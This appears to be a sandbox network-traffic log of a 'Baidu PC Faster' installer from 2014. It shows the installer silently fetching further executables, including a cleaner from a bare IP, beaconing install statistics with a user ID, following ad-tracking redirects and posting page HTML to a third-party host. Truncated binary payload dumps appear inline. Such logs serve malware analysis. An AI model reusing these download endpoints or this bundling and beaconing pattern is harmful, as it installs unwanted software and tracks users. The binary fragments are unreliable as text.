2042..<!DOCTYPE html>..<html lang="pt">..<head>.. <script>var tm = new Date().getTime();var tr = [tm];</script>.. <!--[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><![endif]-->.. <meta charset="utf-8"/>.. <title>Baidu PC Faster | We Make PC Faster</title>.. <script> .. void function(g,f,j,c,h,d,b){g.alogObjectName=h,g[h]=g[h]||function(){(g[h].q=g[h].q||[]).push(arguments)},g[h].l=g[h].l|| new Date,d=f.createElement(j),d.async=!0,d.src=c,b=f.getElementsByTagName(j)[0],b.parentNode.insertBefore(d,b)}(window,document,"script","hXXp://img.baidu.com/hunter/alog/alog.min.js","alog");void function(){function c(){return;}window.PDC={mark:function(a,b){alog("speed.set",a,b|| new Date);alog.fire&&alog.fire("mark")},init:function(a){alog("speed.set","options",a)},view_start:c,tti:c,page_ready:c}}();void function(n){var o=!1;n.onerror=function(n,e,t,c){var i=!0;return!e&&/^script error/i.test(n)&&(o?i=!1:o=!0),i&&alog("exception.send","exception",{msg:n,js:e,ln:t,col:c}),!1},alog("exception.on","catch",function(n){alog("exception.send","exception",{msg:n.msg,js:n.path,ln:n.ln,method:n.method,flag:"catch"})})}(window);.. </script>.. <meta property="og:title" content="Baidu PC Faster | We Make PC Faster" />.. <meta property="og:type" content="website" />.. <meta property="og:url" content="hXXp://security.baidu.co.th/th/about.php" />.. <meta property="og:image
<<< skipped >>>
GET /cgi/s2s/dl.php?cr=&lang=pt&ptn=da&host=http://dl-vip.pcfaster.baidu.com/&sid=144327560 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 8.0
Host: VVV.pcfaster.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ptn=da
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 15:42:06 GMT
Server: Apache
Content-Disposition: attachment;filename="PC_Faster_Setup_Mini_B104_V12169244.exe";
Vary: Accept-Encoding
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
1e6c20..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t4..0U..0U..0U....,.9U..9-/..U..9-9..U..9->.UU......1U..0U...T.......U..9-0..U......1U..9- .1U..Rich0U..................PE..L...A0.S..........................................@.................................$.....@.................................T........................R.. ...........`...................................@............................................text...V........................... ..`.rdata...%.......&..................@..@.data...............................@....rsrc................|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................U.....Q.}..V..u2.E.............t^...u%f.}..u..V.j.R..L.P..E.......3.^..]......u..N.j.Q..L.P..U.......3.^..]......u..F.j.P..L.P..M.......3.^..]......u*.T$.R.D$......H....|$...M...t......^..]...=....u..E.......U........^..]...=....u..F,.....E............^..]...=......4....N(Q..T...V.j.R..L.P..E............^..]...........j.h:DP.d.....PV. .S.3.P.D$.d......t$.V.5c...D$.....h .@.h..@.j j..F4P..$.Q..F(.....F,.....F0.....v....D$..h..Q.j j.j.j.j.j.j.j.h....j.j.j.j.....P..F$.D$........L$.d......Y^.........
<<< skipped >>>
GET /PC_Faster_Setup_B104.exe?userid={e939675892611217d37e7da12c55d037}&rand=666B747F HTTP/1.1
Range: bytes=0-21768399
Host: dl2.security.baidu.co.th
Accept: */*
User-Agent: PC_Faster_Setup_Mini_B104_1443275604.0.0.80846
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:42:18 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Content-Length: 21768400
Content-Range: bytes 0-21768399/21768400
CDN-key: 68d50987ca3718f76f666ca3ed45f125
Accept-Ranges: bytes
Last-Modified: Fri, 26 Sep 2014 08:37:07 GMT
ETag: "894c054-14c28d0-503f3d27e92c0"
CDN-AGE: 3
MZ......................@...y.L.........................................!..L.!This program cannot be run in DOS mode....$.......<.ydx..7x..7x..7_Hz7{..7_Hl7i..7x..7...7q..7s..7q..7y..7q..7y..7Richx..7........................PE..L....l.K.................d.......B..K5............@...........................".......L...............................................!..<............L. ............................................................................................text....c.......d.................. ..`.rdata...............h..............@..@.data....f..........................@....ndata...................................rsrc....<....!..>..................@..@................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......G..H.P.u..u..u...|.@..K...SV.5..G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..F.W....@..u.W...u....E.P.u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_
<<< skipped >>>
GET /newver_B104.xml?userid={e939675892611217d37e7da12c55d037}&rand=666B747F HTTP/1.1
Range: bytes=0-375
Host: download.pcfaster.baidu.com.eg
Accept: */*
User-Agent: PC_Faster_Setup_Mini_B104_1443275604.0.0.80846
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:42:15 GMT
Content-Type: application/xml
Connection: keep-alive
Content-Length: 376
Content-Range: bytes 0-375/376
CDN-key: ee0b28857a2d13219497c63f49560e4d
Accept-Ranges: bytes
Last-Modified: Mon, 29 Sep 2014 07:18:04 GMT
ETag: "d404ec-178-5042f11504300"
CDN-AGE: 3
...<?xml version="1.0" encoding="UTF-8" ?><update_info md5="8e5ea2c04938259bcf94fe946653efd2"><item name="Baidu_Secure_SystemUp_5.0.4.87531" version="5.0.4.87531" type="full_package" mode="normal" require_admin="yes" parameter="/S" size="21768400" md5="68d50987ca3718f76f666ca3ed45f125" url="hXXp://dl2.security.baidu.co.th/PC_Faster_Setup_B104.exe" thread="1"/></update_info>..
POST /cgi-bin-py/mini_install_statistic_info.cgi HTTP/1.1
Accept: */*
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=------8c798f3784f7406eac4b5fea4ec471d8
User-Agent: BaiduIS/1.0
Host: sync.pcfaster.baidu.com.eg
Content-Length: 1747
Connection: Keep-Alive
--------8c798f3784f7406eac4b5fea4ec471d8
Content-Disposition: form-data; name="ufile01"; filename="rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-32-59-0013-[7375].dat"
Content-Type: application/octet-stream
.......;...... .;.{.e.9.3.9.6.7.5.8.9.2.6.1.1.2.1.7.d.3.7.e.7.d.a.1.2.c.5.5.d.0.3.7.}...........................................................................................................................................................................................M.....-#......:#......?#......_....".......6.3...2.1.7...1.5.8...1.4.1...d............5...0...4...8.7.5.3.1...g..........t.h.t.t.p.:././.d.l.2...s.e.c.u.r.i.t.y...b.a.i.d.u...c.o...t.h./.P.C._.F.a.s.t.e.r._.S.e.t.u.p._.B.1.0.4...e.x.e.?.u.s.e.r.i.d.=.%.7.B.e.9.3.9.6.7.5.8.9.2.6.1.1.2.1.7.d.3.7.e.7.d.a.1.2.c.5.5.d.0.3.7.%.7.D.&.r.a.n.d.=.6.6.6.B.7.4.7.F...h....b.......P.C._.F.a.s.t.e.r._.S.e.t.u.p._.M.i.n.i._.B.1.0.4._.1.4.4.3.2.7.5.6.0.4...0...0...8.0.8.4.6...k....F..... .6.8.d.5.0.9.8.7.c.a.3.7.1.8.f.7.6.f.6.6.6.c.a.3.e.d.4.5.f.1.2.5...l............2.1.7.6.8.4.0.0...m....F..... .8.e.5.e.a.2.c.0.4.9.3.8.2.5.9.b.c.f.9.4.f.e.9.4.6.6.5.3.e.f.d.2...n....F..... .8.e.5.e.a.2.c.0.4.9.3.8.2.5.9.b.c.f.9.4.f.e.9.4.6.6.5.3.e.f.d.2...o..........q.h.t.t.
HTTP/1.1 200 OK
Server: nginx/1.3.9
Date: Sat, 20 Dec 2014 15:42:19 GMT
Content-Type: text/plain
Content-Length: 7
Connection: Keep-Alive
success..
POST /cgi-bin-py/mini_install_statistic_info.cgi HTTP/1.1
Accept: */*
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=------122888794d2b473290cd03c85968f24f
User-Agent: BaiduIS/1.0
Host: sync.pcfaster.baidu.com.eg
Content-Length: 1255
Connection: Keep-Alive
--------122888794d2b473290cd03c85968f24f
Content-Disposition: form-data; name="ufile01"; filename="rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-32-51-0904-[7349].dat"
Content-Type: application/octet-stream
.......;...... .3.{.e.9.3.9.6.7.5.8.9.2.6.1.1.2.1.7.d.3.7.e.7.d.a.1.2.c.5.5.d.0.3.7.}...........................................................................................................................................................................................M.....3#......Z..............\..............c............D.i.r.e.c.t.A.g.e.n.t.s.|.b.r.|.I.B.D.|.B.a.n.n.e.r.|.i.r.s.e.t.u.p...e.x.e.|.S.e.t.u.p. .A.p.p.l.i.c.a.t.i.o.n.|.9...1...0...0.|.S.e.t.u.p. .F.a.c.t.o.r.y. .R.u.n.t.i.m.e.|.9...1...0...0.|.R.u.n.t.i.m.e. .E.n.g.i.n.e. .C.o.p.y.r.i.g.h.t. ... .2.0.1.2. .I.n.d.i.g.o. .R.o.s.e. .C.o.r.p.o.r.a.t.i.o.n. .(.w.w.w...i.n.d.i.g.o.r.o.s.e...c.o.m.).|.1.3.1.3.K.B.|.d.e.c.9.3.1.e.8.6.1.4.0.1.3.9.3.8.0.e.a.0.d.f.5.7.c.d.1.3.2.b.6...p..........H.0.0.0.0.0.0.0.0.-.0.0.0.C.2.9.6.8.1.7.B.B.!.0.0.c.c.4.4.a.8.-.0.b.f.d.-.4.d.1.a.-.8.e.7.a.-.4.7.4.5.2.9.6.3.5.d.9.e.@.#.0.0.0.C.2.9.6.8.1.7.B.B..........D.i.r.e.c.t.A.g.e.n.t.s.|.b.r.|.I.B.D.|.B.a.n.n.e.r..........A...
--------122888794d2b473290cd03c85968f
HTTP/1.1 200 OK
Server: nginx/1.3.9
Date: Sat, 20 Dec 2014 15:42:12 GMT
Content-Type: text/plain
Content-Length: 7
Connection: Keep-Alive
success..
POST /cgi-bin-py/mini_install_statistic_info.cgi HTTP/1.1
Accept: */*
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=------c05107058ae649958a316f7f06fbb4cb
User-Agent: BaiduIS/1.0
Host: sync.pcfaster.baidu.com.eg
Content-Length: 788
Connection: Keep-Alive
--------c05107058ae649958a316f7f06fbb4cb
Content-Disposition: form-data; name="ufile01"; filename="rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-16-0170-[7431].dat"
Content-Type: application/octet-stream
.......;......!...{.e.9.3.9.6.7.5.8.9.2.6.1.1.2.1.7.d.3.7.e.7.d.a.1.2.c.5.5.d.0.3.7.}...........................................................................................................................................................................................M.....0#......p..........H.0.0.0.0.0.0.0.0.-.0.0.0.C.2.9.6.8.1.7.B.B.!.0.0.c.c.4.4.a.8.-.0.b.f.d.-.4.d.1.a.-.8.e.7.a.-.4.7.4.5.2.9.6.3.5.d.9.e.@.#.0.0.0.C.2.9.6.8.1.7.B.B..........D.i.r.e.c.t.A.g.e.n.t.s.|.b.r.|.I.B.D.|.B.a.n.n.e.r..........A...
--------c05107058ae649958a316f7f06fbb4cb--
HTTP/1.1 200 OK
Server: nginx/1.3.9
Date: Sat, 20 Dec 2014 15:42:36 GMT
Content-Type: text/plain
Content-Length: 7
Connection: Keep-Alive
success..
HEAD /newver_B104.xml?userid={e939675892611217d37e7da12c55d037}&rand=666B747F HTTP/1.1
Range: bytes=0-
Host: download.pcfaster.baidu.com.eg
Accept: */*
User-Agent: PC_Faster_Setup_Mini_B104_1443275604.0.0.80846
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:42:14 GMT
Content-Type: application/xml
Content-Length: 376
Connection: keep-alive
Last-Modified: Mon, 29 Sep 2014 07:18:04 GMT
ETag: "d404ec-178-5042f11504300"
Accept-Ranges: bytes
Age: 125297
X-Cache: HIT from baidu-cdn
Via: 1.1 baidu-cdn:7301 (squid/2.7.STABLE9)
CDN-AGE: 0
Content-Range: bytes 0-375/376
GET /download/config/db.php?action=returnjson&name=yet_another_cleaner_mat.exe HTTP/1.1
User-Agent: dsk
Host: 184.173.128.179
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 20 Dec 2014 15:39:46 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.17
45..{"openurl":"http:\/\/VVV.yac.mx\/installed.html","ptid":"banner;mat"}..0..
POST /pcfaster/pcfaster.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 8.0
Host: cyberdados.com
Content-Length: 46577
Connection: Keep-Alive
Cache-Control: no-cache
html= Baidu PC Faster | We Make PC Faster
Date: Sat, 20 Dec 2014 15:42:16 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.4.29
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html9..144327560..0..
GET /ssc/yac.php?pt=mat HTTP/1.1
Accept: */*
User-Agent: Setup Factory 8.0
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.yac.mx
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 20 Dec 2014 15:39:42 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.172670..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN>>
" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<h
tml xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta h
ttp-equiv="Content-Type" content="text/html; charset=utf-8" />..<
;meta http-equiv="refresh" content="0; url=hXXp://VVV.yac.mx/download/
config/down.php?pt=mat" />..<title>YAC</title>..<lin
k href="css/main.css" rel="stylesheet" type="text/css" />..<link
rel="stylesheet" href="/ssa_public/public_download/styles/down_mask.c
ss">..</head>..<body>..<div id="all">...<div i
d="header">.. .<div class="content-box">.. ..<a id="
logo" href="#"><img src="images/logo.png" width="157" height="68
" alt="YAC"/></a>.. .<img id="partner" src="images/
microsoft.jpg" width="347" height="40" />.. </div>..
</div>.. ...<div id="main-box">.. .<div class="
content-box">.. .<div id="main-top">.. &l
t;h1>The World Fastest & Lightest PC Cleaner</h1>..
<h4>Ultimate All-In-One Solution to Keeping Your PC Clean an
d Safe </h4>.. <a href="javascript:;" class="dbt
n">Download Now</a>.. <p>Price: <b>$
0</b> Size: <b>0.7 MB</b>&nbs
p; version <b>5.6.124</b>..
<br><font><b>System Information</b>: You
GET /download/config/down.php?pt=mat HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 8.0
Host: VVV.yac.mx
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: ngx_openresty
Date: Sat, 20 Dec 2014 15:39:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Location: hXXp://75.126.133.150/download/dl/yet_another_cleaner_mat.exe0..
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: VVV.baidu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 15:42:17 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Set-Cookie: BAIDUID=C6C360B8D564A87EAEDFE6FA4A63CAEB:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BAIDUPSID=C6C360B8D564A87EAEDFE6FA4A63CAEB; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BDSVRTM=6; path=/
Set-Cookie: BD_HOME=0; path=/
Set-Cookie: H_PS_PSSID=10107_10709_1425_10571_10399_10213_10501_10497_10646_10052_10458_10387_10066_10218_10686_10356_10667_10096_10658_10442_10700_10461_10403_10360_10626; path=/; domain=.baidu.com
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Cache-Control: private
Cxy_all: baidu 20658da79b7215e64be11fc8806225e5
Expires: Sat, 20 Dec 2014 15:42:17 GMT
X-Powered-By: HPHP
Server: BWS/1.1
BDPAGETYPE: 1
BDQID: 0xb52dcdf0000075af
BDUSERID: 045c..<!DOCTYPE html><!--STATUS OK--><html><head&g>>
t;<meta http-equiv="content-type" content="text/html;charset=utf-8"
><meta http-equiv="X-UA-Compatible" content="IE=Edge"><met
a content="always" name="referrer"><link rel="dns-prefetch" href
="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baidu.
com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><lin
k rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-prefe
tch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//t1
1.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/&g
t;<link rel="dns-prefetch" href="//b1.bdstatic.com"/><title&g
t;...........................</title>.<style index="index" i
d="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper{p
osition:relative;_position:;min-height:100%}#head{padding-bottom:100px
;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;bo
ttom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overflo
w:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text-a
lign:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-style:
none}body,form,#fm{position:relative}td..b990..{text-align:left}img{bo
rder:0}a{color:#00c}a:active{color:#f60}.bg{background-image:url(http:
//s1.bdstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);ba
ckground-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com
/r/www/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_br
GET /adclick.php?pid=7026&wmid=15657&chc=1?= HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 8.0
Host: ads.sprintrade.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: sprintrade_uxid=2b50fb7c5a4ef29925c4ec2191f8ccca3923c4315c6a82c616c1779495c3ebaf; sprintrade_AdCl_p_831=7026; sprintrade_AdCl_wm_831=4361; sprintrade_AdCl_d_831=1419090121; sprintrade_AdCl_c_831=1; sprintrade_AdCl_trk_831=ap7026w4361t1419090121
HTTP/1.1 302 Moved Temporarily
Date: Sat, 20 Dec 2014 15:42:05 GMT
Server: Apache/2.2.15 (Red Hat)
Last-Modified: Sat, 20 Dec 2014 15:42:05 GMT
P3P: policyref="hXXps://help.adspirit.de/w3c/adspirit.p3p", CP="NOI DSP COR NID PSAo PSDo IVAo IVDo OUR STP UNI COM NAV DEM"
Cache-Control: no-store, no-cache, must-revalidate
Expires: 0
Pragma: no-cache
x-own: 80.237.180.18
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Set-Cookie: sprintrade_uxid=2b50fb7c5a4ef29925c4ec2191f8ccca3923c4315c6a82c616c1779495c3eaaf; expires=Mon, 19-Jan-2015 15:42:05 GMT; domain=.sprintrade.com; path=/
x-mcdata: 1
x-mcdata-k: 1421_25
Set-Cookie: sprintrade_AdCl_p_1421=7026; expires=Tue, 20-Jan-2015 15:42:06 GMT; domain=.sprintrade.com; path=/
Set-Cookie: sprintrade_AdCl_wm_1421=15657; expires=Tue, 20-Jan-2015 15:42:06 GMT; domain=.sprintrade.com; path=/
Set-Cookie: sprintrade_AdCl_d_1421=1419090125; expires=Tue, 20-Jan-2015 15:42:06 GMT; domain=.sprintrade.com; path=/
Set-Cookie: sprintrade_AdCl_c_1421=1; expires=Tue, 20-Jan-2015 15:42:06 GMT; domain=.sprintrade.com; path=/
x-ip: "%local server IP%"
x-ipx: 2/538b7108459200607cb0bc306644bf46
x-ct: 3600 / 0
x-ad: 7026/1421/15657/8909/10470/-1/4/1
Set-Cookie: sprintrade_AdCl_trk_1421=ap7026w15657t1419090125; expires=Tue, 20-Jan-2015 15:42:06 GMT; domain=.sprintrade.com; path=/
Connection: close
Location: hXXp://network.adsmarket.com/click/iWdslmfKe5mKZmrEXsp6w4pkaZhfnH6Vt2dsnWege8OJY2yWXpypnY1kaZ1f?dp=ap7026w15657t1419090125&dp2=8909&dp3="%local server IP%"
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
>>
GET /download/dl/yet_another_cleaner_mat.exe HTTP/1.1
Accept: */*
User-Agent: Setup Factory 8.0
Host: 75.126.133.150
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Dec 2014 15:42:45 GMT
Content-Type: application/octet-stream
Content-Length: 783536
Last-Modified: Tue, 09 Dec 2014 06:25:55 GMT
Connection: keep-alive
Expires: Mon, 19 Jan 2015 15:42:45 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytesMZ......................@.............................................>>
..!..L.!This program cannot be run in DOS mode....$.......<.ymx..&g
t;x..>x..>_Hz>{..>_Hl>i..>x..>...>q..>s..&g
t;q..>y..>q..>y..>Richx..>................PE..L......K.
....................R...N..O.............@..........................@.
......V.......................................0.......................
...(...........................................................45.....
..........................text...>........................... ..`.r
data...3.......4..................@..@.data...|....@...$..............
....@....idata..{....0.......@..............@....ndata...P...P........
...................rsrc................X..............@..@............
......................................................................
......................................................................
......................................................................
......................................................................
..................................6..............................S....
....^.........$.........*S...................^.........U..............
.....^....i...~....9^.............Z....EO........[....Vu....a....\...7
....Bi....i...h....c.........y....d.....U.................. ..........
....|.....K........m....x^........._........$J..............J.........
...............U.............m.........c..............................
..................................................................
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: VVV.baidu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 15:42:12 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Set-Cookie: BAIDUID=9FA9D3CD647C33C9E04324D0D7FB5E88:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BAIDUPSID=9FA9D3CD647C33C9E04324D0D7FB5E88; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BDSVRTM=0; path=/
Set-Cookie: BD_HOME=0; path=/
Set-Cookie: H_PS_PSSID=1439_10673_9993_10571_10693_10500_10496_10645_10052_10459_10066_10218_10687_10355_10666_10596_10096_10658_10700_10403_9950_10702_10627; path=/; domain=.baidu.com
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Cache-Control: private
Cxy_all: baidu f8fdaba98df3c314293fce17b6313f83
Expires: Sat, 20 Dec 2014 15:41:21 GMT
X-Powered-By: HPHP
Server: BWS/1.1
BDPAGETYPE: 1
BDQID: 0xff84e2bf00008046
BDUSERID: 014f05..<!DOCTYPE html><!--STATUS OK--><html><head>>
><meta http-equiv="content-type" content="text/html;charset=utf-
8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><m
eta content="always" name="referrer"><link rel="dns-prefetch" hr
ef="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baid
u.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><l
ink rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-pre
fetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//
t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/
><link rel="dns-prefetch" href="//b1.bdstatic.com"/><title
>...........................</title>.<style index="index"
id="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper
{position:relative;_position:;min-height:100%}#head{padding-bottom:100
px;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;
bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overf
low:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text
-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-styl
e:none}body,form,#fm{position:relative}td{text-align:left}img{border:0
}a{color:#00c}a:active{color:#f60}.bg{background-image:url(hXXp://s1.b
dstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);backgrou
nd-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www
/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_browser{
GET /opencgi/downinfo.php?m=end_download&i=e939675892611217d37e7da12c55d0371419090137&s=63.217.158.141&u=hXXp://dl2.security.baidu.co.th/PC_Faster_Setup_B104.exe&t=2014/12/20 12:33:14&v=4.0.0.80846&p=10000&speed=1522468&code=30000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: speedtest.wshifen.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 15:42:34 GMT
Server: Apache/2.2.25 (Unix) PHP/5.2.17
X-Powered-By: PHP/5.2.17
Content-Length: 4
Content-Type: text/html200...
GET /opencgi/downinfo.php?m=start_download&i=e939675892611217d37e7da12c55d0371419090132&s=63.217.158.157&u=hXXp://download.pcfaster.baidu.com.eg/newver_B104.xml&t=2014/12/20 12:32:52&v=4.0.0.80846&p=0&speed=0&code=20000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: speedtest.wshifen.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 15:42:12 GMT
Server: Apache/2.2.25 (Unix) PHP/5.2.17
X-Powered-By: PHP/5.2.17
Content-Length: 4
Content-Type: text/html200.....
GET /opencgi/downinfo.php?m=end_download&i=e939675892611217d37e7da12c55d0371419090132&s=63.217.158.157&u=hXXp://download.pcfaster.baidu.com.eg/newver_B104.xml&t=2014/12/20 12:32:55&v=4.0.0.80846&p=10000&speed=4541&code=30000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: speedtest.wshifen.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 15:42:15 GMT
Server: Apache/2.2.25 (Unix) PHP/5.2.17
X-Powered-By: PHP/5.2.17
Content-Length: 4
Content-Type: text/html200.....
GET /opencgi/downinfo.php?m=start_download&i=e939675892611217d37e7da12c55d0371419090137&s=63.217.158.141&u=hXXp://dl2.security.baidu.co.th/PC_Faster_Setup_B104.exe&t=2014/12/20 12:32:57&v=4.0.0.80846&p=0&speed=0&code=20000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: speedtest.wshifen.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 15:42:17 GMT
Server: Apache/2.2.25 (Unix) PHP/5.2.17
X-Powered-By: PHP/5.2.17
Content-Length: 4
Content-Type: text/html200...
GET /p.ashx?o=30674&f=pb&r=144327560&t=e939675892611217d37e7da12c55d037 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.pcfaster.com/cgi/s2s/statistic.php?sid=144327560&channel=DirectAgents|br|IBD|Banner&uid=e939675892611217d37e7da12c55d037
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: smarttrk.com
Connection: Keep-Alive
Cookie: trk=rkoTnNKHimO39sYzZRHChabikl5Ok//sPzCF7GAfHsZAl aW8EfCcw==; c30674=6cEM4D5HAWZYOp/zu6FfegLs4Kjf E3yuPuyRra4dpWl0x5zR1N0Vg==
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: .sess=d5nxkayi0raklvhjszghxct3; path=/; HttpOnly
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-AspNet-Version: 4.0.30319
Set-Cookie: sid=R17xrgWaTZSs6YRlXvDWKxhQWyaL4CuqaK1dzOyxYFVeob/z41FqNg==; domain=.smarttrk.com; path=/; HttpOnly
Set-Cookie: trk=rkoTnNKHimO39sYzZRHChabikl5Ok//slVodZCnjXhNlUHMESmxvpA==; domain=.smarttrk.com; expires=Fri, 20-Dec-2019 15:43:36 GMT; path=/; HttpOnly
Set-Cookie: c30674=6cEM4D5HAWZYOp/zu6FfegLs4Kjf E3y4q2RlyPHDFn2oHUi6rj5csJ8toiBFiea; domain=.smarttrk.com; expires=Mon, 19-Jan-2015 15:41:47 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 20 Dec 2014 15:43:36 GMT
Content-Length: 199.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?".....ez..MQ-?.hw..Q./...X^|...=
.>...8....u....~....m~............W''.._?..?..]}...q6..a.....
GET /?a=10577&oc=1837&c=8086&s1=&s1=8909&s2=ap7026w4361t1419090121&ckmguid=fe51e140-bf10-4736-9486-c2beb18e2817 HTTP/1.1
Accept: */*
